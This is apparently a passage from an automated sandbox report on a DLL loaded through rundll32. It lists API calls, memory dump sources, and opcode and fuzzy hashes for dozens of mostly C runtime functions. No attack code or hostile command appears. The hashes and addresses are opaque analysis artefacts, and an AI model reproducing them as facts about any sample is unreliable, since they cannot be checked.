                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: GetLastError.KERNEL32(?,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?,?), ref: 6E24D6B2
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D28A
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D295
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2A0
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2AB
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2B6
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2C1
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2CC
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2D7
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2E5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                              • Opcode ID: e6da5f92d362b55d93d3388bfef68d76fdb6f112e1e418cb8713eb5f4aefd41a
                                                                                                                                                                                                                                                              • Instruction ID: 1433ab1b34e22722da2806a0309129cf9853433b43f1ae47800fca3b43ae2161
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6da5f92d362b55d93d3388bfef68d76fdb6f112e1e418cb8713eb5f4aefd41a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E21747A94010CEFCF45DFE4D890DDE7BBAEF08244B0189A6F9199B121DB71EA558F80
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: a5717e4bb782f467b2c0614b6691c31b0ca5f588a961291a44c73a8c66686b07
                                                                                                                                                                                                                                                              • Instruction ID: fb11d168f9d7ad919091496241c2ee8d314936071d988ac48877c6ab8e3cc270
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5717e4bb782f467b2c0614b6691c31b0ca5f588a961291a44c73a8c66686b07
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93C1CFB4A0420E9FDB05CFD9C994FAEBBB6BF4A319F004559E8149B381E7709951CF21
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 6E25436E: CreateFileW.KERNEL32(00000000,00000000,?,6E25475E,?,?,00000000,?,6E25475E,00000000,0000000C), ref: 6E25438B
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2547C9
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6E2547D0
                                                                                                                                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 6E2547DC
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2547E6
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6E2547EF
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6E25480F
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(6E24FCD2), ref: 6E25495C
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6E25498E
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6E254995
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4237864984-0
                                                                                                                                                                                                                                                              • Opcode ID: b9006c1d8732f3105f2e8705a93d003512ddecd5bd249dedc171e47035e52216
                                                                                                                                                                                                                                                              • Instruction ID: b4747a001a0e25d349a6aa39b7c936692d30086f903975729d345af36c96ff84
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9006c1d8732f3105f2e8705a93d003512ddecd5bd249dedc171e47035e52216
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCA13432A1455D8FCF088FA8C955BAEBBB2AB07325F14014DE812AF390D7349837CB61
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 6E255818: _free.LIBCMT ref: 6E25583D
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E25589E
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: HeapFree.KERNEL32(00000000,00000000,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?), ref: 6E24D6A0
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: GetLastError.KERNEL32(?,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?,?), ref: 6E24D6B2
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2558A9
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2558B4
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E255908
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E255913
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E25591E
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E255929
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                              • Opcode ID: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                              • Instruction ID: fee60e6893048a2432fc334691462a7326bdbd6e35a6d083ec0d53926620e21c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F116D75591B0CEBE720A7F0DD0AFCB779EAF00704F408C14B69E66250DB65A5554F90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6E253593
                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 6E253772
                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 6E25378F
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,6E24F5F6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E2537D7
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E253817
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E2538C3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4031098158-0
                                                                                                                                                                                                                                                              • Opcode ID: f100bf019aaf72c076221a591bef9e9b3764a364c382b3106dcebdc342a62c44
                                                                                                                                                                                                                                                              • Instruction ID: afc0f8564cf7d9b32822ba571010b024c1d9b2059c3a6f6727d804321754e951
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f100bf019aaf72c076221a591bef9e9b3764a364c382b3106dcebdc342a62c44
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91D1B9B5D0024D9FDB05CFE8CA889EDBBB6BF09314F24116AE855BB345D330A916CB60
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,6E248DA8,6E24700A,6E247312), ref: 6E2491A7
                                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2491B5
                                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2491CE
                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,6E248DA8,6E24700A,6E247312), ref: 6E249220
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                                              • Opcode ID: f7c3ee54ed675d6a64d536ca859dc75e0d46927bce43e8f0bcdca5955d0280af
                                                                                                                                                                                                                                                              • Instruction ID: 676e20a78a045e76bfdf9cfb25cfec19599d546950a3838bc7cbc2bc4b3aef2b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7c3ee54ed675d6a64d536ca859dc75e0d46927bce43e8f0bcdca5955d0280af
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B00145B625AA1FDFFB0D06F9ED89D973A5BEB03779B200639E520410C0FB914834D120
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                                                                                                              • String ID: y$n
                                                                                                                                                                                                                                                              • API String ID: 1740715915-731774800
                                                                                                                                                                                                                                                              • Opcode ID: 1eeead3c6870d0c88a81e7958a376a8111e416108ebdddd480f7da9cc7db7347
                                                                                                                                                                                                                                                              • Instruction ID: 3f96966e916fc6aae95d4a93a7f1fd0844c7ddb89262a95d318546c867919952
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1eeead3c6870d0c88a81e7958a376a8111e416108ebdddd480f7da9cc7db7347
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C251D17660460FDFEB1D9FD9CA50BAA7BAAEF02705F104929E815462D4D731E860CB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E25120C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                              • API String ID: 0-2837366778
                                                                                                                                                                                                                                                              • Opcode ID: bdb415f4945ab409c4e6a9987e6e15b795458757d5cd1c3de59f2b2b806a0c71
                                                                                                                                                                                                                                                              • Instruction ID: 236c4c828d092802a2122237360690147cd77cbd8ffd86e20c3279554e2a0014
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdb415f4945ab409c4e6a9987e6e15b795458757d5cd1c3de59f2b2b806a0c71
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64217175614A2EBF97005FE59E80D9677AFAB0536D7004D14F918D6350E731ECA88BA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2557C7
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: HeapFree.KERNEL32(00000000,00000000,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?), ref: 6E24D6A0
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: GetLastError.KERNEL32(?,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?,?), ref: 6E24D6B2
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2557D9
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2557EB
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2557FD
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E25580F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                              • Opcode ID: d49535a4ef8ca49a0275abb315b68194c4567bf6e5752b47c39ad4faf8bbe7ea
                                                                                                                                                                                                                                                              • Instruction ID: a15ec74f0178b7d0881183cce415230650c0017c5e4b970fb49a7c44440e13dd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d49535a4ef8ca49a0275abb315b68194c4567bf6e5752b47c39ad4faf8bbe7ea
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6F0143148260EDBAB94DB98E599C5B33EFBF027127610809F41CD7600DB20F8C08EA4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                                              • String ID: *?
                                                                                                                                                                                                                                                              • API String ID: 269201875-2564092906
                                                                                                                                                                                                                                                              • Opcode ID: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                              • Instruction ID: b30e9e0bd04a8794e4232530a9a68b1ad97f1d27e4af14efd3295dc37289e90e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14614AB5D0021E9FDB14CFA8C9809EDFBFAEF49314B24856AD815E7304E775AE418B90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6E248E5F
                                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6E248F13
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                              • String ID: csm$y$n
                                                                                                                                                                                                                                                              • API String ID: 3480331319-3383992723
                                                                                                                                                                                                                                                              • Opcode ID: 6248558af29b3498b685ee2a764a1bf4bcbfa740e81ea6918b6f00023aa46b75
                                                                                                                                                                                                                                                              • Instruction ID: 20438a87cde174028c6bce8ef5fe25aeaf0dc456d7db6a3bf8fbddcbef05f307
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6248558af29b3498b685ee2a764a1bf4bcbfa740e81ea6918b6f00023aa46b75
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D41B335A2021EEBCF08DFA8C884A9EBBB7BF45318F048455F9185B351D7319915CBD1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 6E2498AB
                                                                                                                                                                                                                                                              • CatchIt.LIBVCRUNTIME ref: 6E249991
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CatchEncodePointer
                                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                                              • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                                                              • Opcode ID: b59250a37a04372f19d6f5f2e52db9df2855a4d4711f3d18ad78ec8234a419ff
                                                                                                                                                                                                                                                              • Instruction ID: aab345bd216e8d699692a67c7b05338f37ed5afa904620924ba77f143874294a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b59250a37a04372f19d6f5f2e52db9df2855a4d4711f3d18ad78ec8234a419ff
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1141387190020FEFDF0ACFD4CE80AEE7BB6BF48305F144459E91866255D335A960DB50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,6E27947C,00000000,?,?,6E24C2C2,?,?,6E24C28A,?,?,?), ref: 6E24C325
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,6E279494), ref: 6E24C338
                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,6E24C2C2,?,?,6E24C28A,?,?,?), ref: 6E24C35B
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                              • String ID: y$n
                                                                                                                                                                                                                                                              • API String ID: 4061214504-731774800
                                                                                                                                                                                                                                                              • Opcode ID: ae4b65a0439839baf4bdbd87f1984ac23a858059e467356d9c5360f8ef6ccc3d
                                                                                                                                                                                                                                                              • Instruction ID: c2e646ddcdb8429db76bdfb22996f743dc8bc1929255a498ffe9d22f50f85f6e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae4b65a0439839baf4bdbd87f1984ac23a858059e467356d9c5360f8ef6ccc3d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DF08C31500A2EFBEF119BA5CA1EBDD7F7AEB00B66F044060A915A5150CB758E54EAA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E256DAD
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E256DD6
                                                                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000,6E254603,00000000,6E24FCD2,?,?,?,?,?,?,?,6E254603,6E24FCD2,00000000), ref: 6E256E08
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6E254603,6E24FCD2,00000000,?,?,?,?,00000000,?), ref: 6E256E24
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFileLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1547350101-0
                                                                                                                                                                                                                                                              • Opcode ID: c630971803dc57f2d9506a064620b80522115ff26c1e5779be91cf34746370af
                                                                                                                                                                                                                                                              • Instruction ID: 8222d74da1436e52c1e8dcb4a1c1ee6ccec66fabc002efa1c256ae6595cb219f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c630971803dc57f2d9506a064620b80522115ff26c1e5779be91cf34746370af
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1141C27692160E9BDB415FF8CE80FCD377BAF46365F140D10E824A73A4EB35D8208A61
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 6E2510C1: _free.LIBCMT ref: 6E2510CF
                                                                                                                                                                                                                                                                • Part of subcall function 6E251C1A: WideCharToMultiByte.KERNEL32(?,00000000,6E24F667,00000000,00000001,6E24F5F6,6E253EDB,?,6E24F667,?,00000000,?,6E253C4A,0000FDE9,00000000,?), ref: 6E251CBC
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6E250B07
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6E250B0E
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E250B4D
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6E250B54
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 167067550-0
                                                                                                                                                                                                                                                              • Opcode ID: ff7a087e773d734cc58cccf2d49463829b48733a0d021319afba073dfef6afad
                                                                                                                                                                                                                                                              • Instruction ID: 4f5b6ace61cfcbd5bed1309608b52992b8fc5a58fcfa4d7cb13b051f5542960c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff7a087e773d734cc58cccf2d49463829b48733a0d021319afba073dfef6afad
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0521A1B560461EAF9B109FE68ED0C9BB7AFEF0136D7108915F91997340E731EC608BA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: f03b424a33fbf30c51886c42bf5c6badee14af131e76dbd68f5da647e0325049
                                                                                                                                                                                                                                                              • Instruction ID: 6fa47e40a780d8f55e4dc70e6ed752161858b3cd09e2e4647465ecddc0323eaa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f03b424a33fbf30c51886c42bf5c6badee14af131e76dbd68f5da647e0325049
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20210B71A11A2AEBCF129FE59E44B5A376B9B02765F210510EC15A7380D770E968C5E0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,6E253991,?,00000001,6E24F667,?,6E253E50,00000001,?,?,?,6E24F5F6,?,?), ref: 6E24D3B1
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D40E
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D444
                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,6E2800D0,000000FF,?,6E253E50,00000001,?,?,?,6E24F5F6,?,?,?,6E27EBD8,0000002C,6E24F667), ref: 6E24D44F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast_free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2283115069-0
                                                                                                                                                                                                                                                              • Opcode ID: 159597fc3addd0d6c3c5fa762aa2e71ca5660e3a1a154fbf5b4976c8d5df5936
                                                                                                                                                                                                                                                              • Instruction ID: 3a257786185b03f9f8f6d8d847e9e26fcefdaa92b1543fbfeb825a5efc82ecff
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 159597fc3addd0d6c3c5fa762aa2e71ca5660e3a1a154fbf5b4976c8d5df5936
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB11087620570EEBEB4817E4DC84E5B222F9BC2679F240A24F924532C0EFE198148D31
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000001,00000001,6E280096,6E24D67C,6E24D707,6E280094,?,6E247E19,6E280096,6E280094,?,?,?,6E244DCE,00000001,6E280098), ref: 6E24D508
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D565
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D59B
                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,6E2800D0,000000FF,?,6E247E19,6E280096,6E280094,?,?,?,6E244DCE,00000001,6E280098), ref: 6E24D5A6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast_free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2283115069-0
                                                                                                                                                                                                                                                              • Opcode ID: e7d7f04536a26b918ae7f6218a6c63fd470937567c90455e1e85452cb41516e8
                                                                                                                                                                                                                                                              • Instruction ID: 3fbe758ef5b3d0dfee114181d74410be0e1429a27142f33ae9a0a033b7e5afb3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7d7f04536a26b918ae7f6218a6c63fd470937567c90455e1e85452cb41516e8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA110D762417099FEB4817F5DC84F5B126F97C367DB200B24F528972C0DFA18818C930
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,6E24A304,?,?,6E28C7C4,00000000,?,6E24A42F,00000004,6E2793A4,6E27939C,6E2793A4,00000000), ref: 6E24A2D3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                                                              • Opcode ID: 094aaf7dc9c5d0b9492766a295a3e0a2a94a1808b97f6b686fe6627315d2b9fc
                                                                                                                                                                                                                                                              • Instruction ID: f45c24725413bfac0acecefa81037dbe33f43e12206f538f9db9a3d623fcb14d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 094aaf7dc9c5d0b9492766a295a3e0a2a94a1808b97f6b686fe6627315d2b9fc
